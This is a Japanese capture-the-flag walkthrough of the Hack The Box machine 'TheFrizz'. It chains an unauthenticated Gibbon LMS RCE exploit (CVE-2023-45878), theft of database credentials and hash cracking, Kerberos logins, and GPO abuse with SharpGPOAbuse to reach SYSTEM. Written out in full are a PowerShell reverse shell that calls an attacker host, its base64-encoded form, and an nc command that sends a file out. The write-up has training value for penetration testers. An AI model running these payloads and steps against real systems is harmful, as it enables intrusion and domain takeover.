目次
偵察
nmapによるスキャンを行います。
PORT STATE SERVICE REASON VERSION 22/tcp open ssh syn-ack ttl 127 OpenSSH for_Windows_9.5 (protocol 2.0) 53/tcp open domain syn-ack ttl 127 Simple DNS Plus 80/tcp open http syn-ack ttl 127 Apache httpd 2.4.58 (OpenSSL/3.1.3 PHP/8.2.12) |_http-title: Did not follow redirect to http://frizzdc.frizz.htb/home/ |_http-server-header: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS 88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2026-03-10 19:34:56Z) 135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC 139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn 389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: frizz.htb, Site: Default-First-Site-Name) 445/tcp open microsoft-ds? syn-ack ttl 127 464/tcp open kpasswd5? syn-ack ttl 127 593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0 3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: frizz.htb, Site: Default-First-Site-Name) 3269/tcp open tcpwrapped syn-ack ttl 127 9389/tcp open mc-nmf syn-ack ttl 127 .NET Message Framing 49664/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC 49667/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC 49670/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0 53587/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC 53591/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC 53601/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
TCP/80の調査
ブラウザでアクセスします。
画面右上のリンクからログインページへたどれます。
画面の左下、Powered by Gibbon v25.0.00の記載が確認できます。
Google検索より認証なしでのRCE(CVE-2023-45878)の情報が見つかります。
exploitをクローンして実行します。
┌──(kali㉿kali)-[~/htb/thefrizz] └─$ git clone https://github.com/dgoorden/CVE-2023-45878.git Cloning into 'CVE-2023-45878'... remote: Enumerating objects: 30, done. remote: Counting objects: 100% (30/30), done. remote: Compressing objects: 100% (28/28), done. remote: Total 30 (delta 7), reused 0 (delta 0), pack-reused 0 (from 0) Receiving objects: 100% (30/30), 12.45 KiB | 3.11 MiB/s, done. Resolving deltas: 100% (7/7), done. ┌──(kali㉿kali)-[~/htb/thefrizz/CVE-2023-45878] └─$ python3 CVE-2023-45878.py -l 10.10.14.179 -p 4444 -u http://frizzdc.frizz.htb/Gibbon-LMS/ [!] Exploit written for CVE-2023-45878, Gibbon LMS 25.0.1 [+] Exploit Sent to: http://frizzdc.frizz.htb/Gibbon-LMS/modules/Rubrics/rubrics_visualise_saveAjax.php [+] Reverse Shell Target: 10.10.14.179:4444 [!] Make sure you have a listener running: nc -lvnp 4444 [+] HTTP Response Code: 200 [+] PHP Web Shell Uploaded Successfully! [+] Attempting to trigger reverse shell... [+] Payload delivered. Check your listener. [!] If no connection, verify manually: http://frizzdc.frizz.htb/Gibbon-LMS/asdf.php?cmd=whoami ┌──(kali㉿kali)-[~/htb/thefrizz/CVE-2023-45878] └─$
上記実行後、待ち受けたncでシェルを取得できます。
カレントディレクトリにはconfig.phpがあり、その中にはDBの認証情報があります。
SHELL> dir
Directory: C:\xampp\htdocs\Gibbon-LMS
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 1/20/2023 6:04 AM i18n
d----- 1/20/2023 6:04 AM installer
d----- 1/20/2023 6:04 AM lib
d----- 1/20/2023 6:04 AM modules
d----- 1/20/2023 6:04 AM resources
d----- 1/20/2023 6:04 AM src
d----- 1/20/2023 6:04 AM themes
d----- 10/29/2024 7:28 AM uploads
d----- 1/20/2023 6:04 AM vendor
-a---- 1/20/2023 6:04 AM 634 .htaccess
-a---- 1/20/2023 6:04 AM 197078 CHANGEDB.php
-a---- 1/20/2023 6:04 AM 103023 CHANGELOG.txt
-a---- 1/20/2023 6:04 AM 2972 composer.json
-a---- 1/20/2023 6:04 AM 294353 composer.lock
-a---- 10/11/2024 8:15 PM 1307 config.php
SHELL> type config.php
.
*/
/**
* Sets the database connection information.
* You can supply an optional $databasePort if your server requires one.
*/
$databaseServer = 'localhost';
$databaseUsername = 'MrGibbonsDB';
$databasePassword = 'MisterGibbs!Parrot!?1';
$databaseName = 'gibbon';
/**
* Sets a globally unique id, to allow multiple installs on a single server.
*/
$guid = '7y59n5xz-uym-ei9p-7mmq-83vifmtyey2';
/**
* Sets system-wide caching factor, used to balance performance and freshness.
* Value represents number of page loads between cache refresh.
* Must be positive integer. 1 means no caching.
*/
$caching = 10;
SHELL>
ディレクトリを「C:\xampp\mysql\bin」へ移動してDBへのアクセスを試みます。
mysql.exeを実行しても応答がないため、-eオプションを使って情報を探します。
SHELL> ./mysql.exe -u MrGibbonsDB -p'MisterGibbs!Parrot!?1'
SHELL> show databases;
Invoke-Expression : The term 'show' is not recognized as the name of a cmdlet, function, script file, or operable
program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
At line:1 char:482
+ ... r,0,$BytesRead-1);$Output=try{Invoke-Expression $Command 2>&1|Out-Str ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : ObjectNotFound: (show:String) [Invoke-Expression], CommandNotFoundException
+ FullyQualifiedErrorId : CommandNotFoundException,Microsoft.PowerShell.Commands.InvokeExpressionCommand
SHELL> ./mysql.exe -u MrGibbonsDB -p'MisterGibbs!Parrot!?1' -Bse 'show databases;'
gibbon
information_schema
test
SHELL>
gibbonpersonでf.frizzle のパスワードのハッシュが見つかりました。
./mysql.exe -u MrGibbonsDB -p'MisterGibbs!Parrot!?1' -E -e 'use gibbon; select * from gibbonperson'
SHELL>
*************************** 1. row ***************************
gibbonPersonID: 0000000001
title: Ms.
surname: Frizzle
firstName: Fiona
preferredName: Fiona
officialName: Fiona Frizzle
nameInCharacters:
gender: Unspecified
username: f.frizzle
passwordStrong: 067f746faca44f170c6cd9d7c4bdac6bc342c608687733f80ff784242b0b0c03
passwordStrongSalt: /aACFhikmNopqrRTVz2489
passwordForceReset: N
status: Full
canLogin: Y
gibbonRoleIDPrimary: 001
gibbonRoleIDAll: 001
dob: NULL
email: f.frizzle@frizz.htb
取得したハッシュとソルトを「:」でつなげてhashcatを実行するとパスワードが取得できます。
$ cat fizzle.hash 067f746faca44f170c6cd9d7c4bdac6bc342c608687733f80ff784242b0b0c03:/aACFhikmNopqrRTVz2489 $ hashcat -m 1420 -a 0 fizzle.hash ./rockyou.txt hashcat (v6.2.5) starting OpenCL API (OpenCL 2.0 pocl 1.8 Linux, None+Asserts, RELOC, LLVM 11.1.0, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project] ===================================================================================================================================== * Device #1: pthread-AMD Ryzen 3 3100 4-Core Processor, 2898/5860 MB (1024 MB allocatable), 8MCU Minimum password length supported by kernel: 0 Maximum password length supported by kernel: 256 Minimim salt length supported by kernel: 0 Maximum salt length supported by kernel: 256 Hashes: 1 digests; 1 unique digests, 1 unique salts Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates Rules: 1 Optimizers applied: * Zero-Byte * Early-Skip * Not-Iterated * Single-Hash * Single-Salt * Raw-Hash ATTENTION! Pure (unoptimized) backend kernels selected. Pure kernels can crack longer passwords, but drastically reduce performance. If you want to switch to optimized kernels, append -O to your commandline. See the above message to find out about the exact limits. Watchdog: Hardware monitoring interface not found on your system. Watchdog: Temperature abort trigger disabled. Host memory required for this attack: 2 MB Dictionary cache hit: * Filename..: ./rockyou.txt * Passwords.: 14344385 * Bytes.....: 139921507 * Keyspace..: 14344385 067f746faca44f170c6cd9d7c4bdac6bc342c608687733f80ff784242b0b0c03:/aACFhikmNopqrRTVz2489:Jenni_Luvs_Magic23 Session..........: hashcat Status...........: Cracked Hash.Mode........: 1420 (sha256($salt.$pass)) Hash.Target......: 067f746faca44f170c6cd9d7c4bdac6bc342c608687733f80ff...Vz2489 Time.Started.....: Sun Mar 15 23:21:05 2026 (5 secs) Time.Estimated...: Sun Mar 15 23:21:10 2026 (0 secs) Kernel.Feature...: Pure Kernel Guess.Base.......: File (./rockyou.txt) Guess.Queue......: 1/1 (100.00%) Speed.#1.........: 2498.8 kH/s (0.32ms) @ Accel:512 Loops:1 Thr:1 Vec:8 Recovered........: 1/1 (100.00%) Digests Progress.........: 11022336/14344385 (76.84%) Rejected.........: 0/11022336 (0.00%) Restore.Point....: 11018240/14344385 (76.81%) Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1 Candidate.Engine.: Device Generator Candidates.#1....: JessdoG1 -> JazIris@@
f.frizzleのアカウントはKerberos認証で成功します。
┌──(kali㉿kali)-[~/htb/thefrizz] └─$ netexec smb frizzdc.frizz.htb -u f.frizzle -p 'Jenni_Luvs_Magic23' -k SMB frizzdc.frizz.htb 445 frizzdc [*] x64 (name:frizzdc) (domain:frizz.htb) (signing:True) (SMBv1:False) (NTLM:False) SMB frizzdc.frizz.htb 445 frizzdc [-] frizz.htb\f.frizzle:Jenni_Luvs_Magic23 KRB_AP_ERR_SKEW
Kerberos認証が成功している為、対象のアカウントでTGTを作成します。
┌──(kali㉿kali)-[~/htb/thefrizz]
└─$ impacket-getTGT frizz.htb/f.frizzle:Jenni_Luvs_Magic23
Impacket v0.14.0.dev0+20260109.161801.028f0724 - Copyright Fortra, LLC and its affiliated companies
[*] Saving ticket in f.frizzle.ccache
krb5.confを作成します。
┌──(kali㉿kali)-[~/htb/thefrizz] └─$ netexec smb frizzdc.frizz.htb -u f.frizzle -p Jenni_Luvs_Magic23 -k --generate-krb5-file krb5.conf SMB frizzdc.frizz.htb 445 frizzdc [*] x64 (name:frizzdc) (domain:frizz.htb) (signing:True) (SMBv1:False) (NTLM:False) SMB frizzdc.frizz.htb 445 frizzdc [+] frizz.htb\f.frizzle:Jenni_Luvs_Magic23
user.txt取得
作成したkrb5.confとf.frizzle.ccacheを使用してKerberos認証を行います。
SSHでアクセスするとuser.txtが取得できます。
┌──(kali㉿kali)-[~/htb/thefrizz]
└─$ export KRB5_CONFIG=krb5.conf
export KRB5CCNAME=f.frizzle.ccache
┌──(kali㉿kali)-[~/htb/thefrizz]
└─$ ssh f.frizzle@frizz.htb
The authenticity of host 'frizz.htb (10.129.7.89)' can't be established.
ED25519 key fingerprint is: SHA256:667C2ZBnjXAV13iEeKUgKhu6w5axMrhU346z2L2OE7g
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'frizz.htb' (ED25519) to the list of known hosts.
** WARNING: connection is not using a post-quantum key exchange algorithm.
** This session may be vulnerable to "store now, decrypt later" attacks.
** The server may need to be upgraded. See https://openssh.com/pq.html
PowerShell 7.4.5
PS C:\Users\f.frizzle>
権限昇格
bloodhoundを実行して情報を集めます。
┌──(kali㉿kali)-[~/htb/thefrizz]
└─$ bloodhound-python -u f.frizzle -p 'Jenni_Luvs_Magic23' -d frizz.htb -dc frizzdc.frizz.htb -ns 10.129.232.168 -c All --zip
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: frizz.htb
INFO: Getting TGT for user
INFO: Connecting to LDAP server: frizzdc.frizz.htb
INFO: Testing resolved hostname connectivity dead:beef::cbac:db18:1aa1:7e6e
INFO: Trying LDAP connection to dead:beef::cbac:db18:1aa1:7e6e
INFO: Testing resolved hostname connectivity dead:beef::194
INFO: Trying LDAP connection to dead:beef::194
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: frizzdc.frizz.htb
INFO: Testing resolved hostname connectivity dead:beef::cbac:db18:1aa1:7e6e
INFO: Trying LDAP connection to dead:beef::cbac:db18:1aa1:7e6e
INFO: Testing resolved hostname connectivity dead:beef::194
INFO: Trying LDAP connection to dead:beef::194
INFO: Found 22 users
INFO: Found 53 groups
INFO: Found 2 gpos
INFO: Found 2 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: frizzdc.frizz.htb
INFO: Done in 00M 36S
INFO: Compressing output into 20260322225046_bloodhound.zip
また、SSHでログインしドメインユーザーを確認します。
確認できたユーザーはリストとして保存します。
PS C:\Users\f.frizzle> net user /domain User accounts for \\ ------------------------------------------------------------------------------- a.perlstein Administrator c.ramon c.sandiego d.hudson f.frizzle g.frizzle Guest h.arm J.perlstein k.franklin krbtgt l.awesome m.ramon M.SchoolBus p.terese r.tennelli t.wright v.frizzle w.li w.Webservice The command completed with one or more errors. PS C:\Users\f.frizzle>
ユーザーのごみ箱はC:\$RECYCLE.BINに保存されます。
ごみ箱には.7zのファイルがあります。
PS C:\> cd '$RECYCLE.BIN'
PS C:\$RECYCLE.BIN> ls -force
Directory: C:\$RECYCLE.BIN
Mode LastWriteTime Length Name
---- ------------- ------ ----
d--hs 10/29/2024 7:31 AM S-1-5-21-2386970044-1145388522-2932701813-1103
PS C:\$RECYCLE.BIN> cd S-1-5-21-2386970044-1145388522-2932701813-1103
PS C:\$RECYCLE.BIN\S-1-5-21-2386970044-1145388522-2932701813-1103> ls
Directory: C:\$RECYCLE.BIN\S-1-5-21-2386970044-1145388522-2932701813-1103
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a--- 10/29/2024 7:31 AM 148 $IE2XMEG.7z
-a--- 10/24/2024 9:16 PM 30416987 $RE2XMEG.7z
PS C:\$RECYCLE.BIN\S-1-5-21-2386970044-1145388522-2932701813-1103>
見つかった.7zをデスクトップに移動します。
PS C:\$RECYCLE.BIN> Get-ChildItem -Force -File -Recurse 'C:\$RECYCLE.BIN' -Filter '*.7z' | ForEach-Object { Move-Item $_.FullName "$env:USERPROFILE\Desktop" }
PS C:\$RECYCLE.BIN> cd
PS C:\Users\f.frizzle> cd Desktop
PS C:\Users\f.frizzle\Desktop> ls
Directory: C:\Users\f.frizzle\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a--- 10/29/2024 7:31 AM 148 $IE2XMEG.7z
-a--- 10/24/2024 9:16 PM 30416987 $RE2XMEG.7z
-ar-- 3/18/2026 1:19 PM 34 user.txt
公式のWalkthroughでは対象の7zファイルをscpでkaliに転送する記載がありましたが、自分の環境では転送できませんでした。
その他meterpreterをアップロードし、そこからファイルの転送を行うことも試してみましたがうまくいきませんでした。
自分の環境では最終的にnc.exeを使ってファイルの転送を行いました。
ncの移動(kaliでWebサーバを起動した状態で実行)
Invoke-WebRequest -Uri "http://10.10.14.179/nc.exe" -OutFile "nc.exe" アップロードしたnc経由でファイルを転送 cmd /c ".\nc.exe 10.10.14.179 4444 < c:\Users\`$RE2XMEG.7z"
待ち受け側(kali) ┌──(kali㉿kali)-[~/htb/thefrizz] └─$ sudo nc -lnvp 4444 > R.7z listening on [any] 4444 ... connect to [10.10.14.179] from (UNKNOWN) [10.129.232.168] 51766
ファイル転送の完了は確認できませんでしたが、ファイルサイズが30416987バイトで止まっていたため、そこでCtrl+cで終了しファイルを展開しました。
ファイルを展開するとwaptというディレクトリが展開されます。
┌──(kali㉿kali)-[~/htb/thefrizz/wapt] └─$ ls COPYING.txt common.py languages setupdevhelpers.py ssl wapt-get.exe wapt-signpackages.py waptlicences.pyd waptserver.exe waptwua DLLs conf lib setuphelpers.py templates wapt-get.exe.manifest wapt.psproj waptmessage.exe waptservice.exe wgetwads32.exe Scripts conf.d licencing.py setuphelpers_linux.py trusted_external_certs wapt-get.ini waptbinaries.sha256 waptpackage.py wapttftpserver wgetwads64.exe __pycache__ db log setuphelpers_macos.py unins000.msg wapt-get.ini.tmpl waptconsole.exe.manifest waptpython.exe wapttftpserver.exe auth_module_ad.py keyfinder.py private setuphelpers_unix.py version-full wapt-get.py waptcrypto.py waptpythonw.exe wapttray.exe cache keys revision.txt setuphelpers_windows.py wapt-enterprise.ico wapt-scanpackages.py waptguihelper.pyd waptself.exe waptutils.py
/conf/waptserver.iniにパスワード情報が見つかります。
┌──(kali㉿kali)-[~/htb/thefrizz/wapt] └─$ grep -r 'password =' . ./waptutils.py: self._password = password ./waptutils.py: self._password = self._password_callback(self._keyfile) ./conf/waptserver.ini:wapt_password = IXN1QmNpZ0BNZWhUZWQhUgo=
base64デコードをするとパスワードが確認できます。
┌──(kali㉿kali)-[~/htb/thefrizz/wapt] └─$ echo 'IXN1QmNpZ0BNZWhUZWQhUgo=' | base64 -d !suBcig@MehTed!R
取得したパスワードはM.SchoolBusのものであることがわかります。
┌──(kali㉿kali)-[~/htb/thefrizz]
└─$ netexec smb frizzdc.frizz.htb -u users.txt -p '!suBcig@MehTed!R' -k --continue-on-success
SMB frizzdc.frizz.htb 445 frizzdc [*] x64 (name:frizzdc) (domain:frizz.htb) (signing:True) (SMBv1:False) (NTLM:False)
SMB frizzdc.frizz.htb 445 frizzdc [-] frizz.htb\a.perlstein:!suBcig@MehTed!R KDC_ERR_PREAUTH_FAILED
SMB frizzdc.frizz.htb 445 frizzdc [-] frizz.htb\Administrator:!suBcig@MehTed!R KDC_ERR_PREAUTH_FAILED
SMB frizzdc.frizz.htb 445 frizzdc [-] frizz.htb\c.ramon:!suBcig@MehTed!R KDC_ERR_PREAUTH_FAILED
SMB frizzdc.frizz.htb 445 frizzdc [-] frizz.htb\c.sandiego:!suBcig@MehTed!R KDC_ERR_PREAUTH_FAILED
SMB frizzdc.frizz.htb 445 frizzdc [-] frizz.htb\d.hudson:!suBcig@MehTed!R KDC_ERR_PREAUTH_FAILED
SMB frizzdc.frizz.htb 445 frizzdc [-] frizz.htb\f.frizzle:!suBcig@MehTed!R KDC_ERR_PREAUTH_FAILED
SMB frizzdc.frizz.htb 445 frizzdc [-] frizz.htb\g.frizzle:!suBcig@MehTed!R KDC_ERR_PREAUTH_FAILED
SMB frizzdc.frizz.htb 445 frizzdc [-] frizz.htb\Guest:!suBcig@MehTed!R KDC_ERR_CLIENT_REVOKED
SMB frizzdc.frizz.htb 445 frizzdc [-] frizz.htb\h.arm:!suBcig@MehTed!R KDC_ERR_PREAUTH_FAILED
SMB frizzdc.frizz.htb 445 frizzdc [-] frizz.htb\J.perlstein:!suBcig@MehTed!R KDC_ERR_PREAUTH_FAILED
SMB frizzdc.frizz.htb 445 frizzdc [-] frizz.htb\k.franklin:!suBcig@MehTed!R KDC_ERR_PREAUTH_FAILED
SMB frizzdc.frizz.htb 445 frizzdc [-] frizz.htb\krbtgt:!suBcig@MehTed!R KDC_ERR_CLIENT_REVOKED
SMB frizzdc.frizz.htb 445 frizzdc [-] frizz.htb\l.awesome:!suBcig@MehTed!R KDC_ERR_PREAUTH_FAILED
SMB frizzdc.frizz.htb 445 frizzdc [-] frizz.htb\m.ramon:!suBcig@MehTed!R KDC_ERR_PREAUTH_FAILED
SMB frizzdc.frizz.htb 445 frizzdc [+] frizz.htb\M.SchoolBus:!suBcig@MehTed!R
SMB frizzdc.frizz.htb 445 frizzdc [-] frizz.htb\p.terese:!suBcig@MehTed!R KDC_ERR_PREAUTH_FAILED
SMB frizzdc.frizz.htb 445 frizzdc [-] frizz.htb\r.tennelli:!suBcig@MehTed!R KDC_ERR_PREAUTH_FAILED
SMB frizzdc.frizz.htb 445 frizzdc [-] frizz.htb\t.wright:!suBcig@MehTed!R KDC_ERR_PREAUTH_FAILED
SMB frizzdc.frizz.htb 445 frizzdc [-] frizz.htb\v.frizzle:!suBcig@MehTed!R KDC_ERR_PREAUTH_FAILED
SMB frizzdc.frizz.htb 445 frizzdc [-] frizz.htb\w.li:!suBcig@MehTed!R KDC_ERR_PREAUTH_FAILED
SMB frizzdc.frizz.htb 445 frizzdc [-] frizz.htb\w.Webservice:!suBcig@MehTed!R KDC_ERR_PREAUTH_FAILED
M.SchoolBusでssh接続します。
┌──(kali㉿kali)-[~/htb/thefrizz] └─$ impacket-getTGT frizz.htb/M.SchoolBus:'!suBcig@MehTed!R' Impacket v0.14.0.dev0+20260109.161801.028f0724 - Copyright Fortra, LLC and its affiliated companies [*] Saving ticket in M.SchoolBus.ccache
┌──(kali㉿kali)-[~/htb/thefrizz]
└─$ netexec smb frizzdc.frizz.htb -u M.SchoolBus -p '!suBcig@MehTed!R' -k --generate-krb5-file krb5.conf SMB frizzdc.frizz.htb 445 frizzdc [*] x64 (name:frizzdc) (domain:frizz.htb) (signing:True) (SMBv1:False) (NTLM:False) SMB frizzdc.frizz.htb 445 frizzdc [+] frizz.htb\M.SchoolBus:!suBcig@MehTed!R
┌──(kali㉿kali)-[~/htb/thefrizz] └─$ export KRB5CCNAME=M.SchoolBus.ccache ┌──(kali㉿kali)-[~/htb/thefrizz] └─$ export KRB5_CONFIG=krb5.conf
また、BloodHoundでM.SchoolBusの権限を見るとOUに対してWriteGPLink(GPOをOUやドメインにリンクする権限)を持っています。
上記の結果より新規にGPOを作成しリバースシェルを実行します。
まず、kaliでリバースシェルのペイロードを作成します。
kali@kali:~$ pwsh
PS> $Text = '$client = New-Object System.Net.Sockets.TCPClient("10.10.14.179",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'
PS> $Bytes = [System.Text.Encoding]::Unicode.GetBytes($Text)
PS> $EncodedText =[Convert]::ToBase64String($Bytes)
PS> $EncodedText
JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0
...
PS> exit
次に新しいGPOを作成します。ここでは「RevGPO」として作成します。
PS C:\Users\M.SchoolBus> New-GPO -Name RevGPO | New-GPLink -Target "DC=FRIZZ,DC=HTB" -LinkEnabled Yes GpoId : 8a4ad255-87a1-49a4-9e6d-b2e7db0af4ac DisplayName : RevGPO Enabled : True Enforced : False Target : DC=frizz,DC=htb Order : 3
次にkaliでncを待ち受けます。
その後、SharpGPOAbuseを使用してリバースシェルのコマンドを設定します。
PS C:\Users\M.SchoolBus> .\SharpGPOAbuse.exe --addcomputertask --GPOName "RevGPO" --Author "test" --TaskName "RevShell" --Command "powershell.exe" --Arguments "powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4AMQA3ADkAIgAsADQANAA0ADQAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACIAUABTACAAIgAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACIAPgAgACIAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA"
[+] Domain = frizz.htb
[+] Domain Controller = frizzdc.frizz.htb
[+] Distinguished Name = CN=Policies,CN=System,DC=frizz,DC=htb
[+] GUID of "RevGPO" is: {8A4AD255-87A1-49A4-9E6D-B2E7DB0AF4AC}
[+] Creating file \\frizz.htb\SysVol\frizz.htb\Policies\{8A4AD255-87A1-49A4-9E6D-B2E7DB0AF4AC}\Machine\Preferences\ScheduledTasks\ScheduledTasks.xml
[+] versionNumber attribute changed successfully
[+] The version number in GPT.ini was increased successfully.
[+] The GPO was modified to include a new immediate task. Wait for the GPO refresh cycle.
[+] Done!
PS C:\Users\M.SchoolBus>
PS C:\Users\M.SchoolBus>
PS C:\Users\M.SchoolBus> gpupdate /force
Updating policy...
Computer Policy update has completed successfully.
User Policy update has completed successfully.
PS C:\Users\M.SchoolBus>
上記のコマンドが完了すると待ち受け側のncでSYSTEM権限のシェルが取得できます。
┌──(kali㉿kali)-[~/htb/thefrizz] └─$ sudo nc -lnvp 4444 listening on [any] 4444 ... connect to [10.10.14.179] from (UNKNOWN) [10.129.232.168] 62937 PS C:\Windows\system32> whoami nt authority\system PS C:\Windows\system32>
